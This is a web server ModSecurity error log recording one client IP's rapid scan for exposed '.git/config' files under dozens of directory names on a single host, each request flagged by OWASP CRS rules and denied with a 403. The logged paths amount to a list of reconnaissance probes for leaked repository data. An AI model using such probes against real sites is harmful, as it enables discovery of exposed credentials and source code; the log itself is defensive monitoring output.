[Wed May 29 05:15:28.747740 2024] [:error] [pid 3548010] [client 91.215.85.43:40504] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRgAAAAI"]
[Wed May 29 05:15:28.748152 2024] [:error] [pid 3548010] [client 91.215.85.43:40504] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRgAAAAI"]
[Wed May 29 05:15:28.751363 2024] [:error] [pid 3548012] [client 91.215.85.43:40498] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPQAAAAQ"]
[Wed May 29 05:15:28.752015 2024] [:error] [pid 3548012] [client 91.215.85.43:40498] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPQAAAAQ"]
[Wed May 29 05:15:28.753732 2024] [:error] [pid 3548008] [client 91.215.85.43:40508] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VQAAAAA"]
[Wed May 29 05:15:28.753988 2024] [:error] [pid 3548008] [client 91.215.85.43:40508] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VQAAAAA"]
[Wed May 29 05:15:28.754182 2024] [:error] [pid 3548008] [client 91.215.85.43:40508] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VQAAAAA"]
[Wed May 29 05:15:28.754251 2024] [:error] [pid 3548012] [client 91.215.85.43:40498] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPQAAAAQ"]
[Wed May 29 05:15:28.744516 2024] [:error] [pid 3548013] [client 91.215.85.43:40458] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnQAAAAU"]
[Wed May 29 05:15:28.755560 2024] [:error] [pid 3548013] [client 91.215.85.43:40458] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnQAAAAU"]
[Wed May 29 05:15:28.768193 2024] [:error] [pid 3549404] [client 91.215.85.43:40472] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /amphtml/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77QAAAAY"]
[Wed May 29 05:15:28.768766 2024] [:error] [pid 3549404] [client 91.215.85.43:40472] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77QAAAAY"]
[Wed May 29 05:15:28.769193 2024] [:error] [pid 3549404] [client 91.215.85.43:40472] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77QAAAAY"]
[Wed May 29 05:15:28.770489 2024] [:error] [pid 3549624] [client 91.215.85.43:40574] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /live/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbQAAAAc"]
[Wed May 29 05:15:28.770672 2024] [:error] [pid 3549624] [client 91.215.85.43:40574] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbQAAAAc"]
[Wed May 29 05:15:28.770823 2024] [:error] [pid 3549624] [client 91.215.85.43:40574] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbQAAAAc"]
[Wed May 29 05:15:28.773583 2024] [:error] [pid 3548011] [client 91.215.85.43:40476] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /beta/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6gAAAAM"]
[Wed May 29 05:15:28.773832 2024] [:error] [pid 3548011] [client 91.215.85.43:40476] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6gAAAAM"]
[Wed May 29 05:15:28.774043 2024] [:error] [pid 3548011] [client 91.215.85.43:40476] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6gAAAAM"]
[Wed May 29 05:15:28.842451 2024] [:error] [pid 3548009] [client 91.215.85.43:40482] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /aomanalyzer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KyAAAAAE"]
[Wed May 29 05:15:28.843025 2024] [:error] [pid 3548009] [client 91.215.85.43:40482] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KyAAAAAE"]
[Wed May 29 05:15:28.843426 2024] [:error] [pid 3548009] [client 91.215.85.43:40482] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KyAAAAAE"]
[Wed May 29 05:15:28.843608 2024] [:error] [pid 3548010] [client 91.215.85.43:40552] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRwAAAAI"]
[Wed May 29 05:15:28.844187 2024] [:error] [pid 3548010] [client 91.215.85.43:40552] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRwAAAAI"]
[Wed May 29 05:15:28.844738 2024] [:error] [pid 3548010] [client 91.215.85.43:40552] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRwAAAAI"]
[Wed May 29 05:15:28.847919 2024] [:error] [pid 3548012] [client 91.215.85.43:40566] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /developer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPgAAAAQ"]
[Wed May 29 05:15:28.848444 2024] [:error] [pid 3548012] [client 91.215.85.43:40566] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPgAAAAQ"]
[Wed May 29 05:15:28.848894 2024] [:error] [pid 3548012] [client 91.215.85.43:40566] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPgAAAAQ"]
[Wed May 29 05:15:28.853999 2024] [:error] [pid 3548008] [client 91.215.85.43:40516] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /gateway/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VgAAAAA"]
[Wed May 29 05:15:28.854292 2024] [:error] [pid 3548008] [client 91.215.85.43:40516] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VgAAAAA"]
[Wed May 29 05:15:28.854461 2024] [:error] [pid 3548008] [client 91.215.85.43:40516] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VgAAAAA"]
[Wed May 29 05:15:28.856122 2024] [:error] [pid 3548013] [client 91.215.85.43:40658] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /alpha/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpngAAAAU"]
[Wed May 29 05:15:28.856706 2024] [:error] [pid 3548013] [client 91.215.85.43:40658] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpngAAAAU"]
[Wed May 29 05:15:28.857102 2024] [:error] [pid 3548013] [client 91.215.85.43:40658] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpngAAAAU"]
[Wed May 29 05:15:28.865268 2024] [:error] [pid 3549624] [client 91.215.85.43:40598] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /git/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbgAAAAc"]
[Wed May 29 05:15:28.865550 2024] [:error] [pid 3549624] [client 91.215.85.43:40598] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbgAAAAc"]
[Wed May 29 05:15:28.865783 2024] [:error] [pid 3549624] [client 91.215.85.43:40598] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbgAAAAc"]
[Wed May 29 05:15:28.874614 2024] [:error] [pid 3548011] [client 91.215.85.43:40634] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6wAAAAM"]
[Wed May 29 05:15:28.874965 2024] [:error] [pid 3548011] [client 91.215.85.43:40634] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6wAAAAM"]
[Wed May 29 05:15:28.875436 2024] [:error] [pid 3549404] [client 91.215.85.43:40528] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /includes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77gAAAAY"]
